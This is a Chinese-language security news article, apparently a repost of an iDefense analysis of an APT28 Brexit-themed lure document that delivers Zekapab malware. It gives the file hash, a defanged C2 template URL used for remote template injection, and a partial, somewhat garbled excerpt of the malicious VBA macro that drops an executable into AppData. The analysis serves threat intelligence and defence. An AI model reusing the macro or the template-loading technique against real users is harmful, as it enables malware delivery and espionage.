1. 软市首页
  2. 行业观察

APT28利用英国脱欧主题钓鱼电子邮件传播Zekapab恶意软件

行业观察

在英国首相特雷莎·梅宣布与欧盟(EU)达成BREXIT(英国脱欧)初步协议草案的同时,iDefense公司的分析人士指出,SNAKEMACKEREL利用一份以BREXIT为主题的诱饵文档,交付了一款名为“Zekapab(也被称为Zebrocy)”的第一阶段恶意软件。

SNAKEMACKEREL是一个以开展间谍活动为主的 络犯罪组织,也被称为Sofacy、Pawn Storm、Sednit、Fancy Bear、APT28、group 74、Tsar Team和Strontium。英国和荷兰政府都曾公然表示,SNAKEMACKEREL隶属于俄罗斯军事情 服务机构(RIS),并与一些特定的 络攻击事件存在关联,包括针对禁止化学武器组织(OPCW)、英国国防和科学技术实验室(DSTL),以及英国外交和联邦事务部(FCO)的攻击。

需要指出的是,这份恶意文档是在英国政府宣布与欧盟达成BREXIT初步协议草案的同一天创建的。这似乎表明,SNAKEMACKEREL是一个密切关注政治事件的 络犯罪组织,能够利用最新的新闻事件来创建诱饵文档,以针对特定目标交付第一阶段恶意软件,如Zekapab。

尽管存在大量有关该组织的公开 道和来自各国政府的指控,但SNAKEMACKEREL仍然非常活跃。它被认为是大量针对全球航空航天和国防承包商、军事组织、政党、国际奥委会(IOC)、反兴奋剂机构、政府部门和各种垂直领域的 络攻击的幕后黑手。到目前为止,SNAKEMACKEREL仍然被认为是影响最为深远,也是最为复杂的 络间谍组织之一。

本 告将针对一份以“BREXIT”为主题的诱饵Microsoft Office文档进行技术分析。如上所述,该文档被用于释放SNAKEMACKEREL活动的第一阶段恶意软件(Delphi版本的Zekapab),iDefense分析师此前曾发表过有关该恶意软件的 告。然而,在对C2服务器109.248.148.42的进一步研究中,iDefense公司的分析师发现了Zekapab的一个新版本(.NET版本),它被设计用于相同的目的。

恶意软件分析

iDefense公司的分析师在最近发现了一份恶意文档,据称与近期英国和欧盟之间的BREXIT谈判有关。

该文件具有以下元数据:

  • 文件名:Brexit 15.11.2018.docx
  • MD5:405655 be03df45881aa88b55603bef1d
  • 文件大小:9 KB(19354字节)
  • 最后修改人:Joohn
  • 版本:Grizli777
  • 创作时间:2018:11:14 14:17:00
  • 修改日期:2018:11:15 04:50:00

    • 这里需要指出的是,Grizli777是Microsoft Word的一个破解版本。

    为了诱使目标启用宏,攻击者故意使用了乱码作为文档的内容(见图1):

    图1. 使用乱码作为文档的内容,以诱使目标启用宏

    该文档被设计为通过内嵌在DOCX文档中的settings.xml.rels组件来从
    hxxp://109.248.148.42/office/thememl/2012/main/attachedTemplate.dotm加载恶意内容(见图2):

    图2.通过settings.xml.rels加载的恶意内容(宏组件)

    下载的宏组件包括一个名为AutoClose()的函数(见图3),以及以Base64编码字符串的形式嵌入的两个payload:

    图3.AutoClose() 函数

    如下代码片段展示的是宏代码的核心部分,与另一起活动(发生于2018年4月份,由ESET 道的)中的宏代码完全相同:

    Public Function FolderExists(FolderPath As String) As Boolean

    On Error Resume Next

    ChDir FolderPath

    If Err Then FolderExists = False Else FolderExists = True

    End Function

    Function FileExists(fname) As Boolean

    On Error Resume Next

    FileExists = Dir(fname) <> vbNullString

    If Err.Number <> 0 Then FileExists = False

    On Error GoTo 0

    End Function

    Sub AutoClose()

    Dim vFileName As String

    Dim vDocName As String

    Application.ActiveWindow.WindowState = wdWindowStateMinimize

    vAdd = “ntslwin.”

    vFileName = Environ(“APPDATA”) & “NetworkNV”

    If Not FolderExists(vFileName) Then MkDir (vFileName)

    vFileName = vFileName + vAdd & “”exe””

    If Not FileExists(vFileName) Then SaveFN vFileName

    Form1.Label1.Caption)

    zyx (vDocName)

    Application.Quit

    End Sub

    Private Function convText(dsf)

    Dim dm

    声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!

    上一篇 2018年11月8日
    下一篇 2018年11月8日

    相关推荐

    首页
    软件超市
    企服市场